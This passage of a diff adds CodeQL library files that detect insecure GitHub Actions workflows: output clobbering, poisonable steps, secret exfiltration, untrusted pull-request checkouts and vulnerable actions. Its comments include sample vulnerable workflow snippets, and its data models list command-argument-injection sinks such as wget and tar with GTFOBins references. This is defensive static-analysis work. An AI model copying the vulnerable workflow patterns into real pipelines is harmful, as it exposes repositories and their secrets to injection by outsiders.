name=OUTPUT::SAFE" + * - id: clob2 + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * # VULNERABLE + * echo "::set-output name=OUTPUT::SAFE" + * echo $BODY + */ +class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { + string clobbering_var; + string clobbered_value; + + WorkflowCommandClobberingFromEnvVarSink() { + exists(Run run, string workflow_cmd_stmt, string clobbering_stmt | + run.getScript() = this.asExpr() and + run.getScript().getAStmt() = clobbering_stmt and + clobbering_stmt.regexpMatch("echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + clobbering_var + ".*") and + exists(run.getInScopeEnvVarExpr(clobbering_var)) and + run.getScript().getAStmt() = workflow_cmd_stmt and + clobbered_value = + trimQuotes(workflow_cmd_stmt.regexpCapture(".*::set-output\\s+name=.*::(.*)", 1)) + ) + } +} + +/** + * - id: clob1 + * run: | + * # VULNERABLE + * PR="$(; diff --git a/actions/ql/lib/codeql/actions/security/PoisonableSteps.qll b/actions/ql/lib/codeql/actions/security/PoisonableSteps.qll new file mode 100644 index 000000000000..1f3bc66bd776 --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -0,0 +1,56 @@ +import actions + +abstract class PoisonableStep extends Step { } + +class DangerousActionUsesStep extends PoisonableStep, UsesStep { + DangerousActionUsesStep() { poisonableActionsDataModel(this.getCallee()) } +} + +class PoisonableCommandStep extends PoisonableStep, Run { + PoisonableCommandStep() { + exists(string regexp | + poisonableCommandsDataModel(regexp) and + this.getScript().getACommand().regexpMatch(regexp) + ) + } +} + +class JavascriptImportUsesStep extends PoisonableStep, UsesStep { + JavascriptImportUsesStep() { + exists(string script, string line | + this.getCallee() = "actions/github-script" and + script = this.getArgument("script") and + line = script.splitAt("\n").trim() and + // const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs') + // const script = require('${{ github.workspace }}/scripts/test.js'); + // const script = require('./scripts'); + line.regexpMatch(".*(import|require)\\(('|\")(\\./|.*github.workspace).*") + ) + } +} + +class SetupNodeUsesStep extends PoisonableStep, UsesStep { + SetupNodeUsesStep() { + this.getCallee() = "actions/setup-node" and + this.getArgument("cache") = "yarn" + } +} + +class LocalScriptExecutionRunStep extends PoisonableStep, Run { + string path; + + LocalScriptExecutionRunStep() { + exists(string cmd, string regexp, int path_group | cmd = this.getScript().getACommand() | + poisonableLocalScriptsDataModel(regexp, path_group) and + path = cmd.regexpCapture(regexp, path_group) + ) + } + + string getPath() { result = normalizePath(path.splitAt(" ")) } +} + +class LocalActionUsesStep extends PoisonableStep, UsesStep { + LocalActionUsesStep() { this.getCallee().matches("./%") } + + string getPath() { result = normalizePath(this.getCallee()) } +} diff --git a/actions/ql/lib/codeql/actions/security/RequestForgeryQuery.qll b/actions/ql/lib/codeql/actions/security/RequestForgeryQuery.qll new file mode 100644 index 000000000000..ca0ac267131f --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/RequestForgeryQuery.qll @@ -0,0 +1,22 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +private class RequestForgerySink extends DataFlow::Node { + RequestForgerySink() { madSink(this, "request-forgery") } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a system command. + */ +private module RequestForgeryConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a system command. */ +module RequestForgeryFlow = TaintTracking::Global; diff --git a/actions/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/actions/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll new file mode 100644 index 000000000000..18a480b1cecc --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll @@ -0,0 +1,21 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +private class SecretExfiltrationSink extends DataFlow::Node { + SecretExfiltrationSink() { madSink(this, "secret-exfiltration") } +} + +/** + * A taint-tracking configuration for untrusted data that reaches a sink where it may lead to secret exfiltration + */ +private module SecretExfiltrationConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof SecretExfiltrationSink } +} + +/** Tracks flow of unsafe user input that is used in a context where it may lead to a secret exfiltration. */ +module SecretExfiltrationFlow = TaintTracking::Global; diff --git a/actions/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/actions/ql/lib/codeql/actions/security/SelfHostedQuery.qll new file mode 100644 index 000000000000..14d36ef0fa85 --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -0,0 +1,45 @@ +import actions + +bindingset[runner] +predicate isGithubHostedRunner(string runner) { + // list of github hosted repos: https://github.com/actions/runner-images/blob/main/README.md#available-images + runner + .toLowerCase() + .regexpMatch("^(ubuntu-([0-9.]+|latest)|macos-([0-9]+|latest)(-x?large)?|windows-([0-9.]+|latest))$") +} + +bindingset[runner] +predicate is3rdPartyHostedRunner(string runner) { + runner.toLowerCase().regexpMatch("^(buildjet|warp)-[a-z0-9-]+$") +} + +/** + * This predicate uses data available in the workflow file to identify self-hosted runners. + * It does not know if the repository is public or private. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate staticallyIdentifiedSelfHostedRunner(Job job) { + exists(string label | + job.getATriggerEvent().getName() = + [ + "issue_comment", "pull_request", "pull_request_review", "pull_request_review_comment", + "pull_request_target", "workflow_run" + ] and + label = job.getARunsOnLabel() and + not isGithubHostedRunner(label) and + not is3rdPartyHostedRunner(label) + ) +} + +/** + * This predicate uses data available in the job log files to identify self-hosted runners. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { + exists(string runner_info | + repositoryDataModel("public", _) and + workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), _, + job.getId(), _, _, runner_info) and + runner_info.indexOf("self-hosted:true") > 0 + ) +} diff --git a/actions/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/actions/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll new file mode 100644 index 000000000000..9668fce2ae00 --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -0,0 +1,384 @@ +import actions +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources +private import codeql.actions.TaintTracking + +string checkoutTriggers() { + result = ["pull_request_target", "workflow_run", "workflow_call", "issue_comment"] +} + +/** + * A taint-tracking configuration for PR HEAD references flowing + * into actions/checkout's ref argument. + */ +private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + ( + // remote flow sources + source instanceof GitHubCtxSource + or + source instanceof GitHubEventCtxSource + or + source instanceof GitHubEventJsonSource + or + source instanceof MaDSource + or + // `ref` argument contains the PR id/number or head ref + exists(Expression e | + source.asExpr() = e and + ( + containsHeadRef(e.getExpression()) or + containsPullRequestNumber(e.getExpression()) + ) + ) + or + // 3rd party actions returning the PR head ref + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_ref" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and + e.getFieldName() = "head_ref" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadBranch", "pullRequestNumber"] + or + step.getCallee() = "github/branch-deploy" and e.getFieldName() = ["ref", "fork_ref"] + ) + ) + ) + } + + predicate isSink(DataFlow::Node sink) { + exists(Uses uses | + uses.getCallee() = "actions/checkout" and + uses.getArgumentExpr(["ref", "repository"]) = sink.asExpr() + ) + } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) + ) + } +} + +module ActionsMutableRefCheckoutFlow = TaintTracking::Global; + +private module ActionsSHACheckoutConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source.asExpr().getATriggerEvent().getName() = + ["pull_request_target", "workflow_run", "workflow_call", "issue_comment"] and + ( + // `ref` argument contains the PR head/merge commit sha + exists(Expression e | + source.asExpr() = e and + containsHeadSHA(e.getExpression()) + ) + or + // 3rd party actions returning the PR head sha + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_sha" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and + e.getFieldName() = "head_sha" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadSha", "mergeCommitSha"] + ) + ) + ) + } + + predicate isSink(DataFlow::Node sink) { + exists(Uses uses | + uses.getCallee() = "actions/checkout" and + uses.getArgumentExpr(["ref", "repository"]) = sink.asExpr() + ) + } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) + ) + } +} + +module ActionsSHACheckoutFlow = TaintTracking::Global; + +bindingset[s] +predicate containsPullRequestNumber(string s) { + exists( + normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.number\\b", "\\bgithub\\.event\\.issue\\.number\\b", + "\\bgithub\\.event\\.pull_request\\.id\\b", + "\\bgithub\\.event\\.pull_request\\.number\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", + // heuristics + "\\bpr_number\\b", "\\bpr_id\\b" + ], _, _) + ) +} + +bindingset[s] +predicate containsHeadSHA(string s) { + exists( + normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", + "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", + "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", + "\\bgithub\\.event\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_suite\\.head_commit\\.id\\b", + "\\bgithub\\.event\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.head_commit\\.id\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_run\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.merge_group\\.head_sha\\b", + "\\bgithub\\.event\\.merge_group\\.head_commit\\.id\\b", + // heuristics + "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bmerge_sha\\b", "\\bpr_head_sha\\b" + ], _, _) + ) +} + +bindingset[s] +predicate containsHeadRef(string s) { + exists( + normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b", + "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.merge_group\\.head_ref\\b", + // heuristics + "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bmerge_ref\\b", "\\bpr_head_ref\\b", + // env vars + "GITHUB_HEAD_REF", + ], _, _) + ) +} + +class SimplePRHeadCheckoutStep extends Step { + SimplePRHeadCheckoutStep() { + // This should be: + // artifact instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + exists(Uses uses | + this = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") and + uses.getATriggerEvent().getName() = checkoutTriggers() + ) + or + this instanceof GitMutableRefCheckout + or + this instanceof GitSHACheckout + or + this instanceof GhMutableRefCheckout + or + this instanceof GhSHACheckout + } +} + +/** Checkout of a Pull Request HEAD */ +abstract class PRHeadCheckoutStep extends Step { + abstract string getPath(); +} + +/** Checkout of a Pull Request HEAD ref */ +abstract class MutableRefCheckoutStep extends PRHeadCheckoutStep { } + +/** Checkout of a Pull Request HEAD ref */ +abstract class SHACheckoutStep extends PRHeadCheckoutStep { } + +/** Checkout of a Pull Request HEAD ref using actions/checkout action */ +class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesStep { + ActionsMutableRefCheckout() { + this.getCallee() = "actions/checkout" and + ( + exists( + ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink + | + ActionsMutableRefCheckoutFlow::flowPath(source, sink) and + this.getArgumentExpr(["ref", "repository"]) = sink.getNode().asExpr() + ) + or + // heuristic base on the step id and field name + exists(string value, Expression expr | + value.regexpMatch(".*(head|branch|ref).*") and expr = this.getArgumentExpr("ref") + | + expr.(StepsExpression).getStepId() = value + or + expr.(SimpleReferenceExpression).getFieldName() = value and + not expr instanceof GitHubExpression + or + expr.(NeedsExpression).getNeededJobId() = value + or + expr.(JsonReferenceExpression).getAccessPath() = value + or + expr.(JsonReferenceExpression).getInnerExpression() = value + ) + ) + } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path") + else result = "GITHUB_WORKSPACE/" + } +} + +/** Checkout of a Pull Request HEAD ref using actions/checkout action */ +class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { + ActionsSHACheckout() { + this.getCallee() = "actions/checkout" and + ( + exists(ActionsSHACheckoutFlow::PathNode source, ActionsSHACheckoutFlow::PathNode sink | + ActionsSHACheckoutFlow::flowPath(source, sink) and + this.getArgumentExpr(["ref", "repository"]) = sink.getNode().asExpr() + ) + or + // heuristic base on the step id and field name + exists(string value, Expression expr | + value.regexpMatch(".*(head|sha|commit).*") and expr = this.getArgumentExpr("ref") + | + expr.(StepsExpression).getStepId() = value + or + expr.(SimpleReferenceExpression).getFieldName() = value and + not expr instanceof GitHubExpression + or + expr.(NeedsExpression).getNeededJobId() = value + or + expr.(JsonReferenceExpression).getAccessPath() = value + or + expr.(JsonReferenceExpression).getInnerExpression() = value + ) + ) + } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path") + else result = "GITHUB_WORKSPACE/" + } +} + +/** Checkout of a Pull Request HEAD ref using git within a Run step */ +class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { + GitMutableRefCheckout() { + exists(string cmd | this.getScript().getACommand() = cmd | + cmd.regexpMatch("git\\s+(fetch|pull).*") and + ( + (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) + or + exists(string varname, string expr | + expr = this.getInScopeEnvVarExpr(varname).getExpression() and + ( + containsHeadRef(expr) or + containsPullRequestNumber(expr) + ) and + exists(cmd.regexpFind(varname, _, _)) + ) + ) + ) + } + + override string getPath() { result = this.(Run).getWorkingDirectory() } +} + +/** Checkout of a Pull Request HEAD ref using git within a Run step */ +class GitSHACheckout extends SHACheckoutStep instanceof Run { + GitSHACheckout() { + exists(string cmd | this.getScript().getACommand() = cmd | + cmd.regexpMatch("git\\s+(fetch|pull).*") and + ( + containsHeadSHA(cmd) + or + exists(string varname, string expr | + expr = this.getInScopeEnvVarExpr(varname).getExpression() and + containsHeadSHA(expr) and + exists(cmd.regexpFind(varname, _, _)) + ) + ) + ) + } + + override string getPath() { result = this.(Run).getWorkingDirectory() } +} + +/** Checkout of a Pull Request HEAD ref using gh within a Run step */ +class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { + GhMutableRefCheckout() { + exists(string cmd | this.getScript().getACommand() = cmd | + cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and + ( + (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) + or + exists(string varname | + ( + containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) or + containsPullRequestNumber(this.getInScopeEnvVarExpr(varname).getExpression()) + ) and + exists(cmd.regexpFind(varname, _, _)) + ) + ) + ) + } + + override string getPath() { result = this.(Run).getWorkingDirectory() } +} + +/** Checkout of a Pull Request HEAD ref using gh within a Run step */ +class GhSHACheckout extends SHACheckoutStep instanceof Run { + GhSHACheckout() { + exists(string cmd | this.getScript().getACommand() = cmd | + cmd.regexpMatch("gh\\s+pr\\s+checkout.*") and + ( + containsHeadSHA(cmd) + or + exists(string varname | + containsHeadSHA(this.getInScopeEnvVarExpr(varname).getExpression()) and + exists(cmd.regexpFind(varname, _, _)) + ) + ) + ) + } + + override string getPath() { result = this.(Run).getWorkingDirectory() } +} diff --git a/actions/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll b/actions/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll new file mode 100644 index 000000000000..920b8ab9d209 --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll @@ -0,0 +1,22 @@ +import actions + +class KnownVulnerableAction extends UsesStep { + string vulnerable_action; + string fixed_version; + string vulnerable_version; + string vulnerable_sha; + + KnownVulnerableAction() { + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, fixed_version) and + this.getCallee() = vulnerable_action and + (this.getVersion() = vulnerable_version or this.getVersion() = vulnerable_sha) + } + + string getFixedVersion() { result = fixed_version } + + string getVulnerableAction() { result = vulnerable_action } + + string getVulnerableVersion() { result = vulnerable_version } + + string getVulnerableSha() { result = vulnerable_sha } +} diff --git a/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll new file mode 100644 index 000000000000..ef258fce2e5c --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -0,0 +1,28 @@ +import actions + +class UnversionedImmutableAction extends UsesStep { + string immutable_action; + + UnversionedImmutableAction() { + isImmutableAction(this, immutable_action) and + not isSemVer(this.getVersion()) + } +} + +bindingset[version] +predicate isSemVer(string version) { + // https://semver.org/#is-there-a-suggested-regular-expression-regex-to-check-a-semver-string with optional v prefix + version + .regexpMatch("^v?(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$") or + // or N or N.x or N.N.x with optional v prefix + version.regexpMatch("^v?[1-9]\\d*$") or + version.regexpMatch("^v?[1-9]\\d*\\.(x|0|([1-9]\\d*))$") or + version.regexpMatch("^v?[1-9]\\d*\\.(0|([1-9]\\d*))\\.(x|0|([1-9]\\d*))$") or + // or latest which will work + version = "latest" +} + +predicate isImmutableAction(UsesStep actionStep, string actionName) { + immutableActionsDataModel(actionName) and + actionStep.getCallee() = actionName +} diff --git a/actions/ql/lib/codeql/files/FileSystem.qll b/actions/ql/lib/codeql/files/FileSystem.qll new file mode 100644 index 000000000000..552b85a4673f --- /dev/null +++ b/actions/ql/lib/codeql/files/FileSystem.qll @@ -0,0 +1,177 @@ +/** Provides classes for working with files and folders. */ + +private import codeql.Locations + +/** A file or folder. */ +abstract class Container extends @container { + /** Gets a file or sub-folder in this container. */ + Container getAChildContainer() { this = result.getParentContainer() } + + /** Gets a file in this container. */ + File getAFile() { result = this.getAChildContainer() } + + /** Gets a sub-folder in this container. */ + Folder getAFolder() { result = this.getAChildContainer() } + + /** + * Gets the absolute, canonical path of this container, using forward slashes + * as path separator. + * + * The path starts with a _root prefix_ followed by zero or more _path + * segments_ separated by forward slashes. + * + * The root prefix is of one of the following forms: + * + * 1. A single forward slash `/` (Unix-style) + * 2. An upper-case drive letter followed by a colon and a forward slash, + * such as `C:/` (Windows-style) + * 3. Two forward slashes, a computer name, and then another forward slash, + * such as `//FileServer/` (UNC-style) + * + * Path segments are never empty (that is, absolute paths never contain two + * contiguous slashes, except as part of a UNC-style root prefix). Also, path + * segments never contain forward slashes, and no path segment is of the + * form `.` (one dot) or `..` (two dots). + * + * Note that an absolute path never ends with a forward slash, except if it is + * a bare root prefix, that is, the path has no path segments. A container + * whose absolute path has no segments is always a `Folder`, not a `File`. + */ + abstract string getAbsolutePath(); + + /** + * Gets the base name of this container including extension, that is, the last + * segment of its absolute path, or the empty string if it has no segments. + * + * Here are some examples of absolute paths and the corresponding base names + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + * + *
Absolute pathBase name
"/tmp/tst.go""tst.go"
"C:/Program Files (x86)""Program Files (x86)"
"/"""
"C:/"""
"D:/"""
"//FileServer/"""
+ */ + string getBaseName() { + result = this.getAbsolutePath().regexpCapture(".*/(([^/]*?)(?:\\.([^.]*))?)", 1) + } + + /** + * Gets the extension of this container, that is, the suffix of its base name + * after the last dot character, if any. + * + * In particular, + * + * - if the name does not include a dot, there is no extension, so this + * predicate has no result; + * - if the name ends in a dot, the extension is the empty string; + * - if the name contains multiple dots, the extension follows the last dot. + * + * Here are some examples of absolute paths and the corresponding extensions + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + *
Absolute pathExtension
"/tmp/tst.go""go"
"/tmp/.classpath""classpath"
"/bin/bash"not defined
"/tmp/tst2."""
"/tmp/x.tar.gz""gz"
+ */ + string getExtension() { + result = this.getAbsolutePath().regexpCapture(".*/([^/]*?)(\\.([^.]*))?", 3) + } + + /** Gets the file in this container that has the given `baseName`, if any. */ + File getFile(string baseName) { + result = this.getAFile() and + result.getBaseName() = baseName + } + + /** Gets the sub-folder in this container that has the given `baseName`, if any. */ + Folder getFolder(string baseName) { + result = this.getAFolder() and + result.getBaseName() = baseName + } + + /** Gets the parent container of this file or folder, if any. */ + Container getParentContainer() { containerparent(result, this) } + + /** + * Gets the relative path of this file or folder from the root folder of the + * analyzed source location. The relative path of the root folder itself is + * the empty string. + * + * This has no result if the container is outside the source root, that is, + * if the root folder is not a reflexive, transitive parent of this container. + */ + string getRelativePath() { + exists(string absPath, string pref | + absPath = this.getAbsolutePath() and sourceLocationPrefix(pref) + | + absPath = pref and result = "" + or + absPath = pref.regexpReplaceAll("/$", "") + "/" + result and + not result.matches("/%") + ) + } + + /** + * Gets the stem of this container, that is, the prefix of its base name up to + * (but not including) the last dot character if there is one, or the entire + * base name if there is not. + * + * Here are some examples of absolute paths and the corresponding stems + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + *
Absolute pathStem
"/tmp/tst.go""tst"
"/tmp/.classpath"""
"/bin/bash""bash"
"/tmp/tst2.""tst2"
"/tmp/x.tar.gz""x.tar"
+ */ + string getStem() { + result = this.getAbsolutePath().regexpCapture(".*/([^/]*?)(?:\\.([^.]*))?", 1) + } + + /** + * Gets a URL representing the location of this container. + * + * For more information see https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/#providing-urls. + */ + abstract string getURL(); + + /** + * Gets a textual representation of the path of this container. + * + * This is the absolute path of the container. + */ + string toString() { result = this.getAbsolutePath() } +} + +/** A folder. */ +class Folder extends Container, @folder { + override string getAbsolutePath() { folders(this, result) } + + /** Gets the URL of this folder. */ + override string getURL() { result = "folder://" + this.getAbsolutePath() } +} + +/** A file. */ +class File extends Container, @file { + override string getAbsolutePath() { files(this, result) } + + /** Gets the URL of this file. */ + override string getURL() { result = "file://" + this.getAbsolutePath() + ":0:0:0:0" } + + /** Holds if this file was extracted from ordinary source code. */ + predicate fromSource() { any() } +} diff --git a/actions/ql/lib/ext/config/argument_injection_sinks.yml b/actions/ql/lib/ext/config/argument_injection_sinks.yml new file mode 100644 index 000000000000..3214ce522876 --- /dev/null +++ b/actions/ql/lib/ext/config/argument_injection_sinks.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: argumentInjectionSinksDataModel + # https://gtfobins.github.io/ + # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection + data: + - ["(awk)\\s(.*?)", 1, 2] + - ["(find)\\s(.*?)", 1, 2] + - ["(git clone)\\s(.*?)", 1, 2] + - ["(sed)\\s(.*?)", 1, 2] + - ["(tar)\\s(.*?)", 1, 2] + - ["(wget)\\s(.*?)", 1, 2] + - ["(zip)\\s(.*?)", 1, 2] + diff --git a/actions/ql/lib/ext/config/context_event_map.yml b/actions/ql/lib/ext/config/context_event_map.yml new file mode 100644 index 000000000000..930a4344e12e --- /dev/null +++ b/actions/ql/lib/ext/config/context_event_map.yml @@ -0,0 +1,53 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: contextTriggerDataModel + data: + - ["commit_comment", "github.event.comment"] + - ["commit_comment", "github.event.changes"] + - ["discussion", "github.event.discussion"] + - ["discussion", "github.event.changes"] + - ["discussion_comment", "github.event.comment"] + - ["discussion_comment", "github.event.discussion"] + - ["discussion_comment", "github.event.changes"] + - ["issues", "github.event.issue"] + - ["issues", "github.event.changes"] + - ["issue_comment", "github.event.issue"] + - ["issue_comment", "github.event.comment"] + - ["issue_comment", "github.event.changes"] + - ["gollum", "github.event.pages"] + - ["gollum", "github.event.changes"] + - ["pull_request_comment", "github.event.comment"] + - ["pull_request_comment", "github.event.pull_request"] + - ["pull_request_comment", "github.head_ref"] + - ["pull_request_comment", "github.event.changes"] + - ["pull_request_review", "github.event.pull_request"] + - ["pull_request_review", "github.event.review"] + - ["pull_request_review", "github.head_ref"] + - ["pull_request_review", "github.event.changes"] + - ["pull_request_review_comment", "github.event.comment"] + - ["pull_request_review_comment", "github.event.pull_request"] + - ["pull_request_review_comment", "github.event.review"] + - ["pull_request_review_comment", "github.head_ref"] + - ["pull_request_review_comment", "github.event.changes"] + - ["pull_request_target", "github.event.pull_request"] + - ["pull_request_target", "github.head_ref"] + - ["pull_request_target", "github.event.changes"] + - ["push", "github.event.commits"] + - ["push", "github.event.head_commit"] + - ["push", "github.event.changes"] + - ["workflow_run", "github.event.workflow"] + - ["workflow_run", "github.event.workflow_run"] + - ["workflow_run", "github.event.changes"] + # workflow_call receives the same event payload as the calling workflow + - ["workflow_call", "github.event.comment"] + - ["workflow_call", "github.event.discussion"] + - ["workflow_call", "github.event.inputs"] + - ["workflow_call", "github.event.issue"] + - ["workflow_call", "github.event.pages"] + - ["workflow_call", "github.event.pull_request"] + - ["workflow_call", "github.event.review"] + - ["workflow_call", "github.event.workflow"] + - ["workflow_call", "github.event.workflow_run"] + - ["workflow_call", "github.event.changes"] + diff --git a/actions/ql/lib/ext/config/externally_triggereable_events.yml b/actions/ql/lib/ext/config/externally_triggereable_events.yml new file mode 100644 index 000000000000..e1bfca52ea79 --- /dev/null +++ b/actions/ql/lib/ext/config/externally_triggereable_events.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: externallyTriggerableEventsDataModel + data: + - ["discussion"] + - ["discussion_comment"] + - ["fork"] + - ["watch"] + - ["issue_comment"] + - ["issues"] + - ["pull_request_comment"] + - ["pull_request_review"] + - ["pull_request_review_comment"] + - ["pull_request_target"] + - ["workflow_run"] # depending on branch filter + - ["workflow_call"] # depending on caller + - ["workflow_dispatch"] + - ["scheduled"] diff --git a/actions/ql/lib/ext/config/immutable_actions.yml b/actions/ql/lib/ext/config/immutable_actions.yml new file mode 100644 index 000000000000..d6a9b1020d73 --- /dev/null +++ b/actions/ql/lib/ext/config/immutable_actions.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: immutableActionsDataModel + data: + - ["actions/checkout"] + - ["actions/cache"] + - ["actions/setup-node"] + - ["actions/upload-artifact"] + - ["actions/setup-python"] + - ["actions/download-artifact"] + - ["actions/github-script"] + - ["actions/setup-java"] + - ["actions/setup-go"] + - ["actions/upload-pages-artifact"] + - ["actions/deploy-pages"] + 